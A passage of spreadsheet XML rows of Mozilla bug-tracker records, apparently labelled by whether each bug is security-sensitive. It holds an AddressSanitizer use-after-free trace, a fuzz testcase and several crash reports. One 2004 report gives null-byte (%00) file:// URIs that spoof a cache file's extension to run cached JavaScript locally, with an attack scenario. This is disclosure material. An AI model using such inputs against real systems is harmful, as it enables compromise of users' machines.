    #11 0x7ff8e3ee692c in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:641
    #12 0x7ff8e3ee72f0 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:425
    #13 0x7ff8e3f38ba1 in mozilla::detail::RunnableFunction&lt;`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:135:7'&gt;::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:532
    #14 0x7ff8e3f0f71b in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1148
    #15 0x7ff8e3f1fffc in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:466
    #16 0x7ff8e52d5eae in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #17 0x7ff8e51e41a5 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #18 0x7ff8e51e3f75 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #19 0x7ff8ed40cfda in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137
    #20 0x7ff8ed5f410b in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:603
    #21 0x7ff8f1a0d934 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:917
    #22 0x7ff8e51e41a5 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #23 0x7ff8e51e3f75 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #24 0x7ff8f1a0cdc7 in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:749
    #25 0x7ff61d731f49 in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #26 0x7ff61d7314d4 in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:131
    #27 0x7ff61d82f3f7 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #28 0x7ff97f857033 in BaseThreadInitThunk+0x13 (C:\Windows\System32\KERNEL32.DLL+0x180017033)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1844 in mozilla::ipc::MessageChannel::MessageTask::Run
Shadow bytes around the buggy address:
  0x049a7b918ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x049a7b918bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x049a7b918bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x049a7b918bd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x049a7b918be0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x049a7b918bf0: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x049a7b918c00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x049a7b918c10: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
  0x049a7b918c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x049a7b918c30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x049a7b918c4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11116==ABORTING
```</t>
        </is>
      </c>
      <c r="X1108" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1109">
      <c r="A1109" t="n">
        <v>1182583</v>
      </c>
      <c r="B1109" t="inlineStr">
        <is>
          <t>2015-07-10 11:24:05 -0700</t>
        </is>
      </c>
      <c r="C1109" t="inlineStr">
        <is>
          <t>Change waiting for Autoland message to include information about tree closures</t>
        </is>
      </c>
      <c r="D1109" t="inlineStr">
        <is>
          <t>2016-02-21 20:31:38 -0800</t>
        </is>
      </c>
      <c r="E1109" t="n">
        <v>1</v>
      </c>
      <c r="F1109" t="n">
        <v>1</v>
      </c>
      <c r="G1109" t="n">
        <v>6</v>
      </c>
      <c r="H1109" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1109" t="inlineStr">
        <is>
          <t>MozReview Graveyard</t>
        </is>
      </c>
      <c r="J1109" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1109" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1109" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1109" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1109" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1109" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1109" t="inlineStr"/>
      <c r="Q1109" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1109" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1109" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1109" t="n">
        <v>1</v>
      </c>
      <c r="U1109" t="n">
        <v>0</v>
      </c>
      <c r="V1109" t="n">
        <v>4</v>
      </c>
      <c r="W1109" t="inlineStr">
        <is>
          <t>Autoland will automatically retry pushes to closed trees. We should change the "Waiting for autoland request to execute, hold tight." status message to indicate this information so people know about this.</t>
        </is>
      </c>
      <c r="X1109" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1110">
      <c r="A1110" t="n">
        <v>748613</v>
      </c>
      <c r="B1110" t="inlineStr">
        <is>
          <t>2012-04-24 17:32:49 -0700</t>
        </is>
      </c>
      <c r="C1110" t="inlineStr">
        <is>
          <t>[ESR] Assertion failure: [infer failure] Missing type pushed 0: float, at jsinfer.cpp:348</t>
        </is>
      </c>
      <c r="D1110" t="inlineStr">
        <is>
          <t>2013-11-07 11:29:04 -0800</t>
        </is>
      </c>
      <c r="E1110" t="n">
        <v>1</v>
      </c>
      <c r="F1110" t="n">
        <v>1</v>
      </c>
      <c r="G1110" t="n">
        <v>3</v>
      </c>
      <c r="H1110" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1110" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1110" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1110" t="inlineStr">
        <is>
          <t>10 Branch</t>
        </is>
      </c>
      <c r="L1110" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1110" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1110" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1110" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1110" t="inlineStr">
        <is>
          <t>[sg:critical][qa+:ashughes][advisory-tracking+] fixed on m-c by 692274</t>
        </is>
      </c>
      <c r="Q1110" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1110" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1110" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1110" t="n">
        <v>1</v>
      </c>
      <c r="U1110" t="n">
        <v>0</v>
      </c>
      <c r="V1110" t="n">
        <v>16</v>
      </c>
      <c r="W1110" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-esr10 revision 65efc6ce102f (options -m -n -a):
try {
Object.prototype.nameSETS = 0;
function ownProperties() {
    var props = {};
    var r = function () {};
    for (var a in r) {
        let (a = function() { for (var r=0;r&lt;6;++r) ++a; }) {
            a();
        }
        props[a] = true;
    }
}
ownProperties();
} catch(exc1) {}
According to bisection, the issue might have been fixed on mozilla-central by this revision:
The first good revision is:
changeset:   83258:9272bb82eeba
user:        Luke Wagner
date:        Fri Oct 07 12:02:50 2011 -0700
summary:     Bug 692274, part 3 - Remove JSOP_BLOCKCHAIN and JSOP_NULLBLOCKCHAIN, which produces incorrect let scoping until the next patch (r=jorendorff)
Marking s-s because infer failures can be security related.</t>
        </is>
      </c>
      <c r="X1110" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1111">
      <c r="A1111" t="n">
        <v>1061214</v>
      </c>
      <c r="B1111" t="inlineStr">
        <is>
          <t>2014-09-01 07:07:34 -0700</t>
        </is>
      </c>
      <c r="C1111" t="inlineStr">
        <is>
          <t>MarkJitExitFrame() doesn't mark some VM wrapper argument types</t>
        </is>
      </c>
      <c r="D1111" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:54 -0700</t>
        </is>
      </c>
      <c r="E1111" t="n">
        <v>1</v>
      </c>
      <c r="F1111" t="n">
        <v>1</v>
      </c>
      <c r="G1111" t="n">
        <v>3</v>
      </c>
      <c r="H1111" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1111" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1111" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K1111" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1111" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1111" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1111" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1111" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1111" t="inlineStr">
        <is>
          <t>[adv-main33+][adv-esr31.2+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q1111" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1111" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1111" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T1111" t="n">
        <v>1</v>
      </c>
      <c r="U1111" t="n">
        <v>0</v>
      </c>
      <c r="V1111" t="n">
        <v>16</v>
      </c>
      <c r="W1111" t="inlineStr">
        <is>
          <t>The machinery to work out which argument types to mark relies on template specialization, but the default case is not to mark.  Unfortunately some types are missing so these don't get marked.
I guess this is a security issue now we use exact rooting, although I think this would be very hard to exploit in practice.</t>
        </is>
      </c>
      <c r="X1111" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1112">
      <c r="A1112" t="n">
        <v>1553314</v>
      </c>
      <c r="B1112" t="inlineStr">
        <is>
          <t>2019-05-21 14:41:20 -0700</t>
        </is>
      </c>
      <c r="C1112" t="inlineStr">
        <is>
          <t>Remove configman-style required_config from Rules</t>
        </is>
      </c>
      <c r="D1112" t="inlineStr">
        <is>
          <t>2019-05-30 12:17:35 -0700</t>
        </is>
      </c>
      <c r="E1112" t="n">
        <v>1</v>
      </c>
      <c r="F1112" t="n">
        <v>1</v>
      </c>
      <c r="G1112" t="n">
        <v>4</v>
      </c>
      <c r="H1112" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1112" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1112" t="inlineStr">
        <is>
          <t>Processor</t>
        </is>
      </c>
      <c r="K1112" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1112" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1112" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1112" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1112" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1112" t="inlineStr"/>
      <c r="Q1112" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1112" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1112" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1112" t="n">
        <v>1</v>
      </c>
      <c r="U1112" t="n">
        <v>0</v>
      </c>
      <c r="V1112" t="n">
        <v>16</v>
      </c>
      <c r="W1112" t="inlineStr">
        <is>
          <t>In bug 1409648 / https://github.com/mozilla-services/socorro/pull/4253, rules were simplified, but still have some ``configman`` code:
* Rules are derived from ``socorro.processor.rules.base.Rule``, which is based on ``configman.RequiredConfig``. Tests pass if this is removed.
* Rules include a ``required_config`` class attribute, but these are unused, but instead use the the ``ProcessorApp.config`` passed into the rule at initialization. This should be removed, and replaced with initialization of instance attributes in the ``__init__`` method (my preference), or documentation of what config items are used.
This may be part of replacing configman with everett (bug 1529342).</t>
        </is>
      </c>
      <c r="X1112" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1113">
      <c r="A1113" t="n">
        <v>250906</v>
      </c>
      <c r="B1113" t="inlineStr">
        <is>
          <t>2004-07-11 12:24:34 -0700</t>
        </is>
      </c>
      <c r="C1113" t="inlineStr">
        <is>
          <t>null (%00) in filename fakes extension (ftp, file)</t>
        </is>
      </c>
      <c r="D1113" t="inlineStr">
        <is>
          <t>2024-01-13 10:52:44 -0800</t>
        </is>
      </c>
      <c r="E1113" t="n">
        <v>1</v>
      </c>
      <c r="F1113" t="n">
        <v>1</v>
      </c>
      <c r="G1113" t="n">
        <v>3</v>
      </c>
      <c r="H1113" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1113" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1113" t="inlineStr">
        <is>
          <t>Networking: File</t>
        </is>
      </c>
      <c r="K1113" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L1113" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1113" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N1113" t="inlineStr">
        <is>
          <t>NEW</t>
        </is>
      </c>
      <c r="O1113" t="inlineStr"/>
      <c r="P1113" t="inlineStr">
        <is>
          <t>[necko-triaged]</t>
        </is>
      </c>
      <c r="Q1113" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1113" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1113" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1113" t="n">
        <v>1</v>
      </c>
      <c r="U1113" t="n">
        <v>2</v>
      </c>
      <c r="V1113" t="n">
        <v>45</v>
      </c>
      <c r="W1113" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2
The first bug is that firefox stores the cache data in a known location.
This location depends partially on the OS, but in windows 2000 the path look as
following: C:\Documents and Settings\Administrator\Application
Data\Mozilla\Firefox\Profiles\default.nop\Cache.
There are 3 files in this directory that have known names, _CACHE_001_,
_CACHE_002_, and _CACHE_003_.
The second bug is the famous NULL bug. By submiting the following URI
"file://C:\Documents and Settings\Administrator\Application
Data\Mozilla\Firefox\Profiles\default.nop\Cache\_CACHE_001_" we cause firefox to
pop up a download window, but since we want to cause firefox to execute the
javascript code inside one of the CACHE files we can just do the following:
"file://C:\Documents and Settings\Administrator\Application
Data\Mozilla\Firefox\Profiles\default.nop\Cache\_CACHE_001_%00.txt"
or 
"file://C:\Documents and Settings\Administrator\Application
Data\Mozilla\Firefox\Profiles\default.nop\Cache\_CACHE_001_%00.html"
Firefox thinks that we are calling a html/text file, yet it still only open the
cache file without the .html.
The combination of these 2 bugs could lead to the following situations:
If someone finds a way to redirect a user in Internet Zone to a file://
location, it is possible to execute code on a victim in Local Zone and thus
compromising the victims computer.
If the attacker can make a user visit his website (to store the malicious code
in one of the cache files) and then make him go to one of the 2 urls shown
above, the attacker can take over the victims computer.
I hope you take this seriously, it's not as bad as the Internet Explorer
vulnerabilities, but it's close.
- Mindwarper
- mindwarper@mlsecurity.com
- http://www.mlsecurity.com
Reproducible: Always
Steps to Reproduce:
Clearly explained in Details Section.
Actual Results:  
I was able to execute javascript in local zone.
Expected Results:  
Software should create an unkown path to the cache directory, and ignore %00
when reading local files.</t>
        </is>
      </c>
      <c r="X1113" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1114">
      <c r="A1114" t="n">
        <v>422283</v>
      </c>
      <c r="B1114" t="inlineStr">
        <is>
          <t>2008-03-11 17:36:10 -0700</t>
        </is>
      </c>
      <c r="C1114" t="inlineStr">
        <is>
          <t>Crash [@ nsContainerFrame::ReflowOverflowContainerChildren] with -moz-column</t>
        </is>
      </c>
      <c r="D1114" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:46 -0700</t>
        </is>
      </c>
      <c r="E1114" t="n">
        <v>1</v>
      </c>
      <c r="F1114" t="n">
        <v>1</v>
      </c>
      <c r="G1114" t="n">
        <v>3</v>
      </c>
      <c r="H1114" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1114" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1114" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1114" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1114" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1114" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1114" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1114" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1114" t="inlineStr">
        <is>
          <t>[sg:critical] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q1114" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1114" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1114" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1114" t="n">
        <v>1</v>
      </c>
      <c r="U1114" t="n">
        <v>0</v>
      </c>
      <c r="V1114" t="n">
        <v>21</v>
      </c>
      <c r="W1114" t="inlineStr">
        <is>
          <t>Created attachment 308768
testcase
Loading the testcase (in a Mac trunk debug build) triggers:
###!!! ASSERTION: frame not in line: 'line-&gt;Contains(aDeletedFrame)', file /Users/jruderman/trunk/mozilla/layout/generic/nsBlockFrame.cpp, line 5366
###!!! ASSERTION: can't find deleted frame in lines: 'Error', file /Users/jruderman/trunk/mozilla/layout/generic/nsBlockFrame.cpp, line 5346
Crash:
* [@ nsContainerFrame::ReflowOverflowContainerChildren] calling 0xdddddddd
* [@ nsOverflowContinuationTracker::StepForward] dereferencing 0xddddde01</t>
        </is>
      </c>
      <c r="X1114" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1115">
      <c r="A1115" t="n">
        <v>1143130</v>
      </c>
      <c r="B1115" t="inlineStr">
        <is>
          <t>2015-03-13 12:45:54 -0700</t>
        </is>
      </c>
      <c r="C1115" t="inlineStr">
        <is>
          <t>nsTextFrame::GetCharacterOffsetAtFrame returns uninitialized nsIFrame::ContentOffsets</t>
        </is>
      </c>
      <c r="D1115" t="inlineStr">
        <is>
          <t>2018-07-06 11:46:04 -0700</t>
        </is>
      </c>
      <c r="E1115" t="n">
        <v>1</v>
      </c>
      <c r="F1115" t="n">
        <v>1</v>
      </c>
      <c r="G1115" t="n">
        <v>3</v>
      </c>
      <c r="H1115" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1115" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1115" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1115" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1115" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1115" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1115" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1115" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1115" t="inlineStr">
        <is>
          <t>[CID 1285939][post-critsmash-triage][adv-main40+]</t>
        </is>
      </c>
      <c r="Q1115" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1115" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1115" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T1115" t="n">
        <v>1</v>
      </c>
      <c r="U1115" t="n">
        <v>0</v>
      </c>
      <c r="V1115" t="n">
        <v>5</v>
      </c>
      <c r="W1115" t="inlineStr">
        <is>
          <t>Coverity indicates that |nsTextFrame::GetCharacterOffsetAtFrame| returns an instance of |nsIFrame::ContentOffsets| with unitialized members [1] (offset, secondaryOffset, associate).
This is a non-issue if every usage checks |ContentOffsets::content| prior to using other values. I'm not sure if that's the case.
Flagging as sec as it's not clear to me where/how these uninitialized values are used.
[1] https://hg.mozilla.org/mozilla-central/annotate/11506aaf7064/layout/generic/nsTextFrame.cpp#l6492</t>
        </is>
      </c>
      <c r="X1115" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1116">
      <c r="A1116" t="n">
        <v>468771</v>
      </c>
      <c r="B1116" t="inlineStr">
        <is>
          <t>2008-12-09 21:04:23 -0800</t>
        </is>
      </c>
      <c r="C1116" t="inlineStr">
        <is>
          <t>"ASSERTION: the pointer to this sibling will be overwritten" with -moz-column, table</t>
        </is>
      </c>
      <c r="D1116" t="inlineStr">
        <is>
          <t>2010-04-11 17:01:43 -0700</t>
        </is>
      </c>
      <c r="E1116" t="n">
        <v>1</v>
      </c>
      <c r="F1116" t="n">
        <v>1</v>
      </c>
      <c r="G1116" t="n">
        <v>3</v>
      </c>
      <c r="H1116" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1116" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1116" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1116" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1116" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1116" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1116" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1116" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1116" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1116" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1116" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1116" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1116" t="n">
        <v>1</v>
      </c>
      <c r="U1116" t="n">
        <v>0</v>
      </c>
      <c r="V1116" t="n">
        <v>24</v>
      </c>
      <c r="W1116" t="inlineStr">
        <is>
          <t>Created attachment 352264
testcase
###!!! ASSERTION: the pointer to this sibling will be overwritten: '!aNewFrame-&gt;GetNextSibling()', file /Users/jruderman/central/layout/generic/nsFrameList.cpp, line 176
###!!! ASSERTION: Some objects allocated with AllocateFrame were not freed: 'mFrameCount == 0', file /Users/jruderman/central/layout/base/nsPresShell.cpp, line 675
Likely exploitable.  The testcase doesn't cause a crash, but a variant (created with the usual trick) makes Firefox dereference 0xdadadaf6.</t>
        </is>
      </c>
      <c r="X1116" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1117">
      <c r="A1117" t="n">
        <v>1771774</v>
      </c>
      <c r="B1117" t="inlineStr">
        <is>
          <t>2022-05-30 09:04:28 -0700</t>
        </is>
      </c>
      <c r="C1117" t="inlineStr">
        <is>
          <t>Directory indices plaintext serialization (nsDirectoryIndexStream) shouldn't just echo all URL input</t>
        </is>
      </c>
      <c r="D1117" t="inlineStr">
        <is>
          <t>2023-01-16 20:44:08 -0800</t>
        </is>
      </c>
      <c r="E1117" t="n">
        <v>1</v>
      </c>
      <c r="F1117" t="n">
        <v>1</v>
      </c>
      <c r="G1117" t="n">
        <v>3</v>
      </c>
      <c r="H1117" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1117" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1117" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1117" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1117" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M1117" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1117" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1117" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1117" t="inlineStr">
        <is>
          <t>[necko-priority-review][necko-triaged][adv-main103+][adv-esr91.12+][adv-esr102.1+]</t>
        </is>
      </c>
      <c r="Q1117" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1117" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1117" t="inlineStr">
        <is>
          <t>104 Branch</t>
        </is>
      </c>
      <c r="T1117" t="n">
        <v>1</v>
      </c>
      <c r="U1117" t="n">
        <v>0</v>
      </c>
      <c r="V1117" t="n">
        <v>16</v>
      </c>
      <c r="W1117" t="inlineStr">
        <is>
          <t>Like bug 1488061 but for the plaintext serialization code in `nsDirectoryIndexStream.cpp`. Quoting myself from elsewhere:
&gt; As noted in my last comments in bug 1460538, the change in bug 1488061 then also didn't work because it changes the HTML output but not the indexed stream - to fix things that way we need to change https://searchfox.org/mozilla-central/rev/8f42809e51cb07aa4f5739932a06d14581e9dd4a/netwerk/base/nsDirectoryIndexStream.cpp#100,102-103 to strip query params for `file` and/or `jar` and/or `chrome` (or rather, only include it for... well, for what, exactly?)</t>
        </is>
      </c>
      <c r="X1117" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1118">
      <c r="A1118" t="n">
        <v>40324</v>
      </c>
      <c r="B1118" t="inlineStr">
        <is>
          <t>2000-05-23 13:19:12 -0700</t>
        </is>
      </c>
      <c r="C1118" t="inlineStr">
        <is>
          <t>Crash launching Win 98</t>
        </is>
      </c>
      <c r="D1118" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E1118" t="n">
        <v>1</v>
      </c>
      <c r="F1118" t="n">
        <v>1</v>
      </c>
      <c r="G1118" t="n">
        <v>2</v>
      </c>
      <c r="H1118" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1118" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1118" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K1118" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1118" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1118" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N1118" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1118" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1118" t="inlineStr">
        <is>
          <t>[dogfood+][nsbeta2-]</t>
        </is>
      </c>
      <c r="Q1118" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1118" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1118" t="inlineStr">
        <is>
          <t>M16</t>
        </is>
      </c>
      <c r="T1118" t="n">
        <v>1</v>
      </c>
      <c r="U1118" t="n">
        <v>0</v>
      </c>
      <c r="V1118" t="n">
        <v>28</v>
      </c>
      <c r="W1118" t="inlineStr">
        <is>
          <t>Using build 2000-05-23-10 on win98 only, I crash after the splash screen when 
launching netscap6.exe.   Does not happen on Nt 4.0 or win95 per Grace.</t>
        </is>
      </c>
      <c r="X1118" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1119">
      <c r="A1119" t="n">
        <v>313441</v>
      </c>
      <c r="B1119" t="inlineStr">
        <is>
          <t>2005-10-22 22:59:59 -0700</t>
        </is>
      </c>
      <c r="C1119" t="inlineStr">
        <is>
          <t>[SECURITY] Query RSS should HTML-escape summary in &lt;title&gt;</t>
        </is>
      </c>
      <c r="D1119" t="inlineStr">
        <is>
          <t>2007-01-21 08:25:50 -0800</t>
        </is>
      </c>
      <c r="E1119" t="n">
        <v>1</v>
      </c>
      <c r="F1119" t="n">
        <v>1</v>
      </c>
      <c r="G1119" t="n">
        <v>4</v>
      </c>
      <c r="H1119" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1119" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1119" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
